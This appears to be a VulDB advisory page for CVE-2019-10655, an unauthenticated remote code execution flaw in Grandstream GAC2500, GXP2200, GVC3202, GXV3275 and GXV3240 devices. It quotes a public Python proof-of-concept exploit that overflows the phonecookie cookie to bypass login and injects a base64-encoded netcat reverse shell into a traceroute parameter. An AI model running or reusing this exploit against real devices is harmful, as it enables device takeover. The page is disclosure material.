Grandstream GAC2500/GXP2200/GVC3202/GXV3275/GXV3240 up to 1.0.3 manager?action=getlogcat Priority memory corruption

Summaryinfo

A vulnerability classified as critical has been found in Grandstream GAC2500, GXP2200, GVC3202, GXV3275 and GXV3240 up to 1.0.3. This affects an unknown function of the file /manager?action=getlogcat. The manipulation of the argument Priority as part of Shell Metacharacter leads to memory corruption. This vulnerability is referenced as CVE-2019-10655. Remote exploitation of the attack is possible. Furthermore, an exploit is available. It is recommended to upgrade the affected component.

Detailsinfo

A vulnerability, which was classified as critical, has been found in Grandstream GAC2500, GXP2200, GVC3202, GXV3275 and GXV3240 up to 1.0.3. This issue affects some unknown processing of the file /manager?action=getlogcat. The manipulation of the argument priority as part of a Shell Metacharacter leads to a memory corruption vulnerability. Using CWE to declare the problem leads to CWE-119. The product performs operations on a memory buffer, but it can read from or write to a memory location that is outside of the intended boundary of the buffer. Impacted is confidentiality, integrity, and availability. The summary by CVE is:

Grandstream GAC2500 1.0.3.35, GXP2200 1.0.3.27, GVC3202 1.0.3.51, GXV3275 before 1.0.3.219 Beta, and GXV3240 before 1.0.3.219 Beta devices allow unauthenticated remote code execution via shell metacharacters in a /manager?action=getlogcat priority field, in conjunction with a buffer overflow (via the phonecookie cookie) to overwrite a data structure and consequently bypass authentication. This can be exploited via CSRF because the cookie can be placed in an Accept HTTP header in an XMLHttpRequest call to lighttpd.

The bug was discovered 03/22/2019. The weakness was published 03/30/2019 by Brendan Scarvell (GitHub Repository). It is possible to read the advisory at github.com. The identification of this vulnerability is CVE-2019-10655 since 03/30/2019. The attack may be initiated remotely. No form of authentication is needed for a successful exploitation. Technical details as well as a public exploit are known.

A public exploit has been developed by Brendan Scarvell in Python and been published immediately after the advisory. The exploit is available at github.com. It is declared as proof-of-concept. The vulnerability was handled as a non-public zero-day exploit for at least 8 days. During that time the estimated underground price was around $0-$5k. The code used by the exploit is:

HOST = sys.argv[1]
port = 80 if len(sys.argv) < 3 else sys.argv[2]

useTelnet = False

# required for reverse shell
LHOST = "10.1.1.78"
LPORT = 4444

revshell = base64.b64encode("rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/system/xbin/sh -i 2>&1|nc {} {} >/tmp/f".format(LHOST, LPORT))
payload = "{telnetd,-l,sh}" if useTelnet else "echo$IFS\"{}\"|base64$IFS-d|sh".format(revshell)

# Buffer overflow to bypass auth
cookie = "phonecookie=\"{}\"".format("A"*93)

print "[*] Trying to run command.."

req = urllib2.Request('http://' + HOST + '/manager?action=starttraceroute&addr=||'+payload)
req.add_header('Cookie', cookie)

res = urllib2.urlopen(req)
if 'Response=Success' not in res.read():
    print "[!] Exploit failed. Host may not be vulnerable"
else:
    if (useTelnet):
        print "[*] Waiting.."
        time.sleep(2)
        os.system("telnet {}".format(HOST))
    print "[*] Finished."

Upgrading eliminates this vulnerability.

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Productinfo

Vendor

• Grandstream

Name

• GAC2500
• GVC3202
• GXP2200
• GXV3240
• GXV3275

Version

• 1.0.0
• 1.0.1
• 1.0.2
• 1.0.3

License

• commercial

CPE 2.3info

• 🔍
• 🔍
• 🔍

CPE 2.2info

• 🔍
• 🔍
• 🔍

CVSSv4info

CVSSv3info

CVSSv2info

Exploitinginfo

Threat Intelligenceinfo

Countermeasuresinfo

Timelineinfo

Sourcesinfo

Entryinfo

Statistical analysis made it clear that VulDB provides the best quality for vulnerability data.

Discussion